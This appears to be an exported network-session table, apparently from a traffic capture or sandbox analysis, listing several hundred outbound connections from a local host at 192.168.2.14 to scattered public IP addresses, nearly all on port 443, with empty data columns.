                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12120192.168.2.145424227.80.169.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12121192.168.2.1437028126.226.203.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12122192.168.2.145207481.153.128.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12123192.168.2.1449208175.192.57.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12124192.168.2.14608609.186.184.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12125192.168.2.1456000187.135.231.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12126192.168.2.144235438.35.121.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12127192.168.2.1445304156.151.49.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12128192.168.2.1455532188.126.24.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12129192.168.2.1454516121.150.122.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12130192.168.2.1439442182.13.161.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12131192.168.2.1442712148.113.127.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12132192.168.2.1433656182.106.130.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12133192.168.2.1435376151.173.132.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12134192.168.2.143557627.84.50.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12135192.168.2.1444168187.228.160.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12136192.168.2.145269027.30.13.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12137192.168.2.1452298165.32.163.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12138192.168.2.1442316142.55.135.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12139192.168.2.1434302139.31.155.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12140192.168.2.145410678.209.177.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12141192.168.2.1443496161.68.151.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12142192.168.2.145602040.135.63.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12143192.168.2.145818887.112.195.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12144192.168.2.1458452217.248.214.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12145192.168.2.1454510138.124.14.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12146192.168.2.144315254.131.90.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12147192.168.2.1443608157.96.78.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12148192.168.2.1437234177.133.175.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12149192.168.2.143560473.26.164.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12150192.168.2.1441088171.231.224.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12151192.168.2.145588259.162.192.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12152192.168.2.1458306219.96.11.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12153192.168.2.145526874.32.83.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12154192.168.2.145019480.187.98.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12155192.168.2.1434570192.242.230.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12156192.168.2.143762445.72.237.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12157192.168.2.1441100206.161.47.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12158192.168.2.1452898160.207.22.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12159192.168.2.1445614187.187.72.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12160192.168.2.1436136109.240.222.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12161192.168.2.1435510107.178.244.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12162192.168.2.146025689.218.154.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12163192.168.2.1436408206.104.213.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12164192.168.2.145538479.137.29.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12165192.168.2.1455812218.64.54.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12166192.168.2.1455644128.56.117.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12167192.168.2.144634472.86.169.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12168192.168.2.1456772112.143.255.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12169192.168.2.145944899.206.147.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12170192.168.2.1433930174.109.245.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12171192.168.2.145994463.252.138.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12172192.168.2.1438708193.205.21.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12173192.168.2.145116459.156.165.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12174192.168.2.14583745.100.238.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12175192.168.2.144614452.245.244.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12176192.168.2.1454392157.51.41.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12177192.168.2.1434398165.117.235.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12178192.168.2.1441944189.24.62.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12179192.168.2.1437558141.67.210.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12180192.168.2.144866043.218.158.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12181192.168.2.1438912194.79.233.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12182192.168.2.1443196170.163.14.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12183192.168.2.143681651.101.198.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12184192.168.2.1436250169.80.11.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12185192.168.2.144630835.155.196.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12186192.168.2.1439670218.142.72.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12187192.168.2.145788247.5.135.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12188192.168.2.1446066101.186.252.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12189192.168.2.14499022.78.78.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12190192.168.2.143654068.15.181.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12191192.168.2.1456242206.5.81.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192192.168.2.1455516216.234.208.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12193192.168.2.1443082118.156.88.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12194192.168.2.143844459.252.124.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12195192.168.2.14491569.15.191.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12196192.168.2.1456712137.17.35.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12197192.168.2.1460512196.60.127.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12198192.168.2.1439924103.29.175.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12199192.168.2.145759846.133.185.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12200192.168.2.14579044.55.64.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12201192.168.2.1436804221.32.14.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12202192.168.2.143639289.56.81.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12203192.168.2.1457030155.26.165.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12204192.168.2.145618294.89.242.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12205192.168.2.1438098154.31.139.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12206192.168.2.1458530196.39.44.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12207192.168.2.144243468.126.92.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12208192.168.2.145604045.91.122.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12209192.168.2.143932050.157.220.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12210192.168.2.1448034182.212.117.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12211192.168.2.1443288154.31.89.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12212192.168.2.1441062170.117.57.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12213192.168.2.1443016117.113.100.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12214192.168.2.144471027.170.39.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12215192.168.2.1442488125.96.92.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12216192.168.2.143930682.212.58.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12217192.168.2.143305035.195.184.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12218192.168.2.1448838107.157.165.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12219192.168.2.1437214184.163.103.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12220192.168.2.143316034.208.199.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12221192.168.2.145977639.117.47.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12222192.168.2.1455592218.161.237.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12223192.168.2.144868658.249.19.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12224192.168.2.143952682.17.37.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12225192.168.2.146097874.147.142.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12226192.168.2.1434662154.224.242.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12227192.168.2.1437202102.113.217.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12228192.168.2.1442834118.234.238.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12229192.168.2.143637072.128.107.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12230192.168.2.144170039.235.200.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12231192.168.2.1455006150.35.64.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12232192.168.2.1443736140.249.135.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12233192.168.2.1443722164.196.248.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12234192.168.2.145694843.174.156.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12235192.168.2.143782498.126.61.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12236192.168.2.143634883.241.148.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12237192.168.2.1443936139.54.56.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12238192.168.2.143746237.173.188.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12239192.168.2.1449742203.161.243.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12240192.168.2.144773440.83.116.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12241192.168.2.1449636204.9.44.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12242192.168.2.1438342161.162.107.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12243192.168.2.143362636.176.247.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12244192.168.2.1433240219.190.177.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12245192.168.2.1448638151.35.145.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12246192.168.2.14460004.79.171.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12247192.168.2.144845090.115.182.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12248192.168.2.145474478.235.73.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12249192.168.2.1444058107.172.22.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12250192.168.2.1459088163.111.70.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12251192.168.2.144239093.166.169.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12252192.168.2.1442892194.158.24.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12253192.168.2.1459210196.145.47.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12254192.168.2.1442918128.193.172.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12255192.168.2.1441570122.251.73.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12256192.168.2.144974819.17.151.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12257192.168.2.144441624.30.194.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12258192.168.2.144009889.73.208.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12259192.168.2.1449406187.162.196.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12260192.168.2.1445370179.109.164.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12261192.168.2.1454662131.124.59.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12262192.168.2.143702893.98.245.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12263192.168.2.1460464217.149.207.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12264192.168.2.144446664.119.141.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12265192.168.2.1447008177.16.244.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12266192.168.2.144836267.214.185.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12267192.168.2.1433754136.216.123.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12268192.168.2.1445162174.10.132.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12269192.168.2.1441492120.75.27.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12270192.168.2.145113272.107.113.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12271192.168.2.1445162158.2.210.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12272192.168.2.1457292128.188.238.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12273192.168.2.144912214.238.156.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12274192.168.2.145279817.4.231.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12275192.168.2.1438482145.68.47.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12276192.168.2.1438472141.8.195.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12277192.168.2.14587588.156.27.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12278192.168.2.145181071.71.236.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12279192.168.2.1434816216.135.53.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12280192.168.2.1434260139.216.225.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12281192.168.2.1449222217.35.149.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12282192.168.2.1451962194.72.90.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12283192.168.2.1460258141.115.5.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12284192.168.2.1445294125.110.194.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12285192.168.2.143430219.230.70.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12286192.168.2.1453742136.82.83.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12287192.168.2.1449616138.251.134.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12288192.168.2.1434674134.101.58.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12289192.168.2.1442474144.235.247.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12290192.168.2.1448350142.85.53.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12291192.168.2.1433838155.38.94.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12292192.168.2.1447834107.172.160.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12293192.168.2.1444000204.249.18.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12294192.168.2.1445632222.91.207.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12295192.168.2.144785892.229.104.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12296192.168.2.1441350175.209.129.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12297192.168.2.1450832153.34.183.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12298192.168.2.145895025.137.156.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12299192.168.2.1446646149.85.86.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12300192.168.2.145338667.3.188.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12301192.168.2.1454418153.142.50.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12302192.168.2.1452132125.48.47.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12303192.168.2.145333453.53.198.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12304192.168.2.145574651.94.109.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12305192.168.2.1457264119.83.131.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12306192.168.2.1443148104.140.54.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12307192.168.2.144584634.240.143.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12308192.168.2.143982075.36.36.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12309192.168.2.145445051.14.32.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12310192.168.2.1438894113.12.198.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12311192.168.2.1438776155.101.71.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12312192.168.2.1455152183.176.38.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12313192.168.2.144314876.50.45.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12314192.168.2.144485687.131.202.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12315192.168.2.1458760157.95.206.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12316192.168.2.1449526190.202.208.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12317192.168.2.145314823.175.161.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12318192.168.2.144009846.132.75.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12319192.168.2.145325487.232.184.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12320192.168.2.144896072.155.143.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12321192.168.2.1444854112.222.234.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12322192.168.2.1436814212.79.62.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12323192.168.2.1436414102.43.109.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12324192.168.2.143354832.9.1.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12325192.168.2.145888263.215.2.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12326192.168.2.1448692151.159.182.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12327192.168.2.1433106115.41.216.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12328192.168.2.1459926160.14.14.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12329192.168.2.1436464208.152.7.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12330192.168.2.145624663.175.7.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12331192.168.2.1443378106.35.63.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
